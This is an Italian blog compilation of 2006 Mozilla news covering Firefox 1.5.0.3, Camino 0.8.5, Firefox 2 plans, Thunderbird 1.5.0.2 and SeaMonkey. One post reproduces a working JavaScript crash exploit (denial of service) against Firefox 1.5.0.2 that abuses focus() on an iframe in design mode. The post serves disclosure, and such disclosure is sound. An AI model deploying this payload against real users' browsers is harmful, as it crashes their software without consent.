BlogZilla

Firefox 1.5.0.3 corregge il recente bug di sicurezza di cui era affetta la versione 1.5.0.2, il crash del browser causato dalla manipolazione di uno script utilizzando la funzione focus().

Gli aggiornamenti di Firefox sono tempestivi, sono passati ancora 3 giorni dalla scoperta del bug. Ricordate quanto tempo è passato per l’aggiornamento di IE per correggere la falla del createTextRange()?

Per il rilascio ufficiale di Firefox 1.5.0.3 tenete d’occhio la pagina http://www.mozilla.com/firefox/ presto sarà disponibile.

Fonte: Exploit

È disponibile per il download il pacchetto contenente le traduzioni "ufficiali" di Camino 0.8.5 (tra cui anche l’italiano).
Anche questa versione di Camino è scaricabile, come sempre, dalla Sezione Download di Mozilla Italia.

Camino 0.8.5 è un aggiornamento di sicurezza rivolto agli utenti di Mac OS X 10.1, che non posssono quindi utilizzare Camino 1.0. Sarà anche l’ultimo aggiornamento della serie 0.8.x.

Consigliamo a tutti gli utilizzatori di Camino 0.8.4 di provvedere all’aggiornamento.

Richieste di supporto relative all’utilizzo del browser o riguardanti problematiche riscontrate possono essere fatte presso l’apposito forum di Mozilla Italia.

Di Marcello Testi, tratto da Mozilla Italia

Scoperta una nuova vulnerabilità in Firefox che può essere sfruttata per un attacco DoS. Come al solito, il problema risiede nell’interprete Javascript che, in questo caso, causa il crash del browser settando il contenuto attivo da una textarea ad un iframe mediante la funzione focus().

Codice Exploit: (fonte: Securident)

<textarea cols="0" rows="0" id="x_OtherInfo" name="x_OtherInfo"></textarea>
  <script>
       var textarea = document.getElementsByName("x_OtherInfo");
       textarea=textarea.item(0);
           var htmlarea = document.createElement("div");
       htmlarea.className = "htmlarea"; 
       textarea.parentNode.insertBefore(htmlarea, textarea);
       var iframe = document.createElement("iframe");
       htmlarea.appendChild(iframe);
            var doc = iframe.contentWindow.document;
                 doc.designMode = "on";
                 doc.open();
                 doc.write("<iframe src=”>");
          iframe.contentWindow.focus()
  doc.close();
  </script>
</textarea>

Il livello di rischio secondo Secunia non è critico.

Soluzione: Al momento nessuna alternativa a parte quella di disabilitare Javascript

Fonte: Exploit

Due articoli, un post nei gruppi di discussione di Michael Schroepfer e un blog post di Ben Goodger, ci informano di alcune interessanti novità sullo sviluppo della prossima major version del browser open-source.

Ben Goodger, lead engineer per Mozilla Firefox: "Quando abbiamo iniziato a lavorare su Firefox 2, abbiamo deciso di concentrarci sul ‘development branch’, una continuazione del ramo di codice Mozilla 1.8. Il motivo di questa decisione è stata la quantità di significanti modifiche d’architettura in sviluppo sul tronco principale del codice, con in prospettiva un nuovo back-end di rendering, una ri-architettura di reflow nel layout, e varie altre novità".

"Rilasciare Firefox 2 entro il 2006 da questo codice non è sembrato possibile. Di conseguenza abbiamo deciso di dare vita ad una release focalizzata sui miglioramenti a livello di applicazione, su un ramo di codice separato. Affrontando questo, eravamo coscienti dei rischi di uno sviluppo multi-branch … L’obiettivo rimane quello di produrre un release di grande valore in un periodo di tempo breve, in modo da poter tornare tutti a lavorare sul tronco di codice principale e aiutare a sviluppare nuove funzionalità che sfruttino il back-end che sta venendo programmato… L’anno scorso abbiamo prodotto una lista di obiettivi per la release Firefox 2. Circa un mese fa abbiamo formalizzato questi propositi in un Firefox 2 PRD. Abbiamo programmato quattro major pre-release milestone, 2 alpha e 2 beta. La prima alpha è già stata rilasciata, la seconda dovrebbe essere ‘Feature Complete’ … Abbiamo tuttavia capito che la funzionalità più complessa da portare alla luce era ‘Places’ .. probabilmente troppo “sostanziale“ per rientrare nella release Firefox 2. Places si colloca meglio nella categoria di "significante ri-architettura" di funzioni, prevista per Firefox 3."

Michael Schroepfer di Mozilla Corporation: "Preparandoci alla release FF2 Alpha2 del 9 Maggio prossimo è diventato sempre più chiaro che non avremmo avuto tempo sufficiente per completare un implementazione della funzionalità Places che rispettasse i nostri standard per l’esperienza utente e la qualità. Places è una funzione complessa e intrigante che modifica il modo in cui le persone usano preferiti, cronologia e navigano nel loro spazio privato del web. Invece di buttarla via sul mercato, preferiamo impiegare più tempo per programmarla a dovere. Quindi elimineremo Places dal branch 1.8 e continueremo a lavorare sulla funzione nel tronco principale per un integrazione futura. È stata un decisione difficile ma fare questo ad inizio release ci da il tempo di concentraci su un rilascio di grande qualità per FF2 nel terzo trimestre dell’anno e ci offre l’opportunità di rendere Places una funzione veramente innovativa … Firefox 2 comunque migliorerà la sicurezza, il tabbed browsing, la funzionalità di ricerca, il discovery per RSS e contenuti strutturati, le performance e il supporto per le estensioni".

Rimandata la funzione ‘Places’ che combina i bookmarks con la cronologia di browsing e consente all’utente di cercare molto rapidamente nella cronologia e tra i preferiti, offrendo un approccio simile al "tagging", in cima alla lista degli sviluppatori ci sono ora miglioramenti di sicurezza per le estensioni e per plug-in e del motore di ricerca nonché modifiche all’interfaccia utente tab-based. Abbiamo visto in una news precedente che Firefox 2.0 integrerà anche una funzionalità di protezione contro i phishing scams, attraverso una tecnologia sviluppata (forse) in collaborazione con Google. Tra le altre funzionalità di sicurezza previste in Firefox 2.0 c’è anche il supporto per un più robusto tipo di certificato digitale, il cosiddetto "high-assurance certificate". Altre funzionalità in considerazione sono le funzioni "close undo" e “tab overflow” (alpha2), e una funzionalità "session saver-style" che consentirà di ripristinare il browser ad uno stato precedente a shutdown o crash. Firefox 2.0 integrerà infine uno strumento di rimozione per motori di ricerca non desiderati dalla Search Bar e un sistema di controllo ortografico automatico durante la digitazione.

Fonte: Tweakness.net

Mozilla ha rilasciato Thunderbird 1.5.0.2, primo stability e security update per l’ultima versione del client open-source rilasciata ad inizio Gennaio scorso. Thunderbird 1.5.0.2 introduce alcuni miglioramenti in stabilità e sicurezza che fanno parte del programma di Mozilla inteso ad offrire una esperienza internet più sicura ai suoi clienti.

Mozilla raccomanda l’upgrade a tutti gli utenti. Gli utenti della versione 1.5.0.x del client riceveranno automaticamente l’aggiornamento nelle prossime ore. Attualmente la release non è del tutto ufficiale a causa di alcuni problemi proprio con le ‘partial patch’, solo quando saranno popolati tutti server mirror la release verrà pubblicata ufficialmente su www.mozilla.com/thunderbird. Ricordiamo che è comunque possibile cercare manualmente gli aggiornamenti attraverso l’apposito comando.

Precisamente una settimana fa Mozilla aveva reso disponibile il corrispondente update 1.5.0.2 per il browser Firefox, che ha introdotto importanti aggiornamenti di sicurezza per numerose vulnerabilità nel codice del software e il supporto nativo per i Macintosh con processori Intel Core. Le falle di sicurezza più gravi consentono ad un eventuale attacker di iniettare codice malware nei sistemi ancora vulnerabili. Altre debolezze corrette permettono di realizzare facilmente attacchi di phishing e di rubare informazioni sensibili presenti sul PC dell’utente malcapitato. Secondo quanto riporta Mozilla, Thunderbird 1.5.0.2 include lo stesso set di security fixes inclusi in Firefox 1.5.0.2.

• Sommario vulnerabilità in Firefox 1.5.0.2 @ US CERT

Per quanto riguarda le funzionalità, gli sviluppatori hanno migliorato le performance del software sui nuovi Intel Mac ma (al contrario di Firefox) non è stato ancora reso disponibile un universal binary.

Sono stati corretti infine numerosi problemi nel codice che causavano il crash dell’applicazione.

• Download Thunderbird 1.5.0.2 @ mozilla.org FTP
• Note di rilascio
• Changelog @ therumblingedge

Gli utenti del client e-mail open-source avranno notato che Thunderbird è passato direttamente dalla versione 1.5 alla 1.5.0.2. Questo è dovuto alla volontà da parte di Mozilla di mantenere in sincrono la numerazione delle versioni dei suoi due prodotti principali.

La major release Thunderbird 1.5 di Gennaio aveva introdotto una serie di nuove funzionalità tra cui un sistema di aggiornamento software, un correttore ortografico durante la digitazione, un phishing detector integrato, l’auto-save come bozza, e il supporto per la eliminazione degli allegati dai messaggi di posta. Migliorato anche il message filtering con nuove azioni filtro per il replying e il forwarding.

Fonte: Tweakness.net

Rilasciata la seconda versione stabile del progetto nato dopo l’abbandono da parte della Mozilla Foundation di Mozilla Suite. I file da scaricare sono nella sezione download.
A causa dei bug risolti, si consiglia a tutti l’aggiornamento.
Per i problemi di utilizzo, è a disposizione il forum di SeaMonkey.

Di Iacopo Benesperi, tratto da Mozilla Italia